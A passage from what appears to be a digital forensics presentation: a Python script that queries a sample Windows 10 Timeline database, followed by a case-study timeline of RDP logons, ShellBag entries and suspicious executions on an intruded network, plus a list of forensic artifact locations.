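    return int(datetime(*parts, tzinfo=timezone.utc).timestamp())


def build_sample_db():
    """In-memory stand-in for ActivitiesCache.db with three constructed rows.
    Timestamps are Unix epoch seconds (UTC); EndTime 0 means none recorded."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    rows = [
        (b"\x01", json.dumps([{"application": "WinRAR\\WinRAR.exe", "platform": "x_exe_path"}]),
         5, _epoch(2019, 2, 8, 23, 4, 27), 0, _epoch(2019, 2, 8, 23, 4, 27),
         json.dumps({"displayText": "sdl-redline.zip",
                     "contentUri": "file:///Z:/Downloads/sdl-redline.zip"}).encode()),
        (b"\x02", json.dumps([{"application": "Microsoft.MicrosoftEdge", "platform": "windows_universal"}]),
         6, _epoch(2019, 2, 10, 13, 10, 34), _epoch(2019, 2, 10, 13, 10, 51), _epoch(2019, 2, 10, 13, 10, 51),
         json.dumps({"type": "UserEngaged", "activeDurationSeconds": 17}).encode()),
        (b"\x03", json.dumps([{"application": "mspaint.exe", "platform": "x_exe_path"}]),
         5, _epoch(2019, 2, 16, 3, 16, 13), 0, _epoch(2019, 2, 16, 3, 16, 13),
         json.dumps({"displayText": "Picture1.png",
                     "contentUri": "file:///Z:/Presentations/DFIR/Picture1.png"}).encode()),
    ]
    conn.executemany("INSERT INTO Activity VALUES (?, ?, ?, ?, ?, ?, ?)", rows)
    return conn


def _fmt(ts):
    return "N/A" if not ts else datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def query_timeline(conn):
    """One row per activity, oldest first, in the slide's column layout."""
    cur = conn.execute(
        "SELECT AppId, ActivityType, StartTime, EndTime, Payload FROM Activity ORDER BY StartTime")
    out = []
    for app_id, atype, start, end, payload in cur:
        apps = json.loads(app_id)                       # AppId is a JSON list of app identities
        application = apps[0]["application"] if apps else ""
        data = json.loads(payload.decode()) if payload else {}   # assumption: JSON payload
        out.append({
            "start": _fmt(start),
            "end": _fmt(end),
            "application": application,
            "text": data.get("displayText") or data.get("type") or ACTIVITY_TYPES.get(atype, f"Type {atype}"),
            "details": data.get("contentUri", ""),
        })
    return out


if __name__ == "__main__":
    for row in query_timeline(build_sample_db()):
        print(row["start"], row["end"].ljust(19), row["application"].ljust(24), row["text"].ljust(20), row["details"])
```

Against a real database the same SELECT runs unchanged over a copy of ActivitiesCache.db opened with sqlite3.connect; work on a copy, since the live file is held open by the ConnectedDevicesPlatform service and may have a write-ahead log alongside it.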
  • 52. 52
  Time                 Source              System  Details
  2018-12-24 23:11:21  EventLog            ConfPC  Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
  2018-12-25 00:00:23  RDP:MRU             ConfPC  Hostname: 192.168.1.38 User: rewards\ITAdmin
  2018-12-25 00:33:42  RDP:MRU             ConfPC  Hostname: RewardsDB User: rewards\DBO
  2018-12-25 02:40:59  ShellBag:MRU        ConfPC  My Network Places\hqdc1.com\hqdc1.com\general\DC01 [Desktop\2\4\0\0]
  2018-12-25 02:40:59  ShellBag:MRU        ConfPC  My Network Places\hqdc1.com\hqdc1.com\general\DC01\ITIO Server Infrastructure [
  2018-12-25 02:40:59  ShellBag:MRU        ConfPC  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData [Desktop\2\9\0\0\0\1]
  2019-01-01 02:53:11  RDP:MRU             ConfPC  Hostname: Webserver2 User: rewards\frank
  2019-01-11 03:46:21  ShellBag:MRU        ConfPC  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData\Roaming [Desktop\2\9\0\0\0\1\0]
  2019-01-11 03:51:36  ShellBag:MRU        ConfPC  My Computer\C:\Users\ITAdmin [Desktop\0\0\4\3]
  2019-01-11 03:51:54  ShellBag:MRU        ConfPC  My Computer\C:\Users\ITAdmin\AppData [Desktop\0\0\4\3\0]
  2019-01-12 03:41:41  ShellBag:MRU        ConfPC  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop [Desktop\2\9\0\0\0\0]
  2019-01-12 03:41:42  ShellBag:MRU        ConfPC  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\My Impo'tant stuff [Desktop\2\9\0\0\0\0\2]
  2019-01-12 03:42:22  ShellBag:MRU        ConfPC  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\VDI [Desktop\2\9\0\0\0\0\0]
  2019-01-12 03:47:49  ShellBag:MRU        ConfPC  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\AD Resumes [Desktop\2\9\0\0\0\0\1]
  2019-01-12 03:53:14  ShellBag:MRU        ConfPC  My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\O365 [Desktop\2\9\0\0\0\0\3]
  2019-01-12 03:53:47  ShellBag:MRU        ConfPC  My Network Places\hqdc1.com\hqdc1.com\general [Desktop\2\4\0]
  2019-01-15 00:15:01  RDP:MRU             ConfPC  Hostname: ITJumpserver User: rewards\dave
  2019-01-22 00:23:33  EventLog            ConfPC  Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
  2019-01-22 01:33:23  EventLog            Jump    Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
  2019-01-22 01:33:23  EventLog            Jump    Remote Desktop Services: Session logon succeeded: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
  2019-01-22 01:35:34  Registry:LastWrite  Jump    Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip -> omg.zip
  2019-01-22 01:39:03  LNK:Create Time     Jump    C:\Users\dave\Desktop\results.txt (C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk)
  2019-01-22 01:39:23  FN:Create Time      Jump    C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
  2019-01-22 01:39:23  Registry:LastWrite  Jump    Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt -> result.txt
  2019-01-22 01:39:23  UserAssist:Dave     Jump    C:\Users\dave\Desktop\omg.exe
  2019-01-22 01:43:23  UserAssist:Dave     Jump    {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc
  2019-01-22 01:44:56  UserAssist:Dave     Jump    {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe
  2019-01-22 01:45:33  IE:BrowserCache     Jump    Earliest Browser Cache Artifact Created
  2019-01-22 02:28:01  UserAssist:Dave     Jump    {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe
  2019-01-22 02:30:12  IE:BrowserCache     Jump    Most Recent Browser Artifact Modified
  2019-01-22 02:39:45  EventLog            Jump    Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
  2019-01-22 02:39:45  EventLog            Jump    Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
  2019-01-22 02:55:45  EventLog            ConfPC  Remote Desktop Services: Session has been disconnected: User: rewards\ITAdmin Session ID: 2 Source Network Address: 127.0.0.1
  • 53. 53 Case Study – Expanding View
  § Shellbags
  § RDP Logs
  § RDP Connections
  § LNK Files
  § MRU Keys
  § MuiCache
  § Jump Lists
  § RDP Bitmap Cache
  § SimonTatham Registry Values
  § Windows 10 Timeline
  • 54. 54 Other fun Artifacts
  Artifact                Details
  Windows Recycler        C:\$Recycle.Bin\<SID>\$R<RAND>.<EXT> and $I<RAND>.<EXT>
  Browser History         ftp://<AttackerWebsite> ; file:///C:/Windows/127.0.0.1.pwdump
  OpenWith Registry Keys  Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cachedump\OpenWithList ; ...\FileExts\.fgdump-log\OpenWithList
  ViClient Logs           C:\Users\admin\AppData\Local\VMware\vpx\viclient-#-0000.log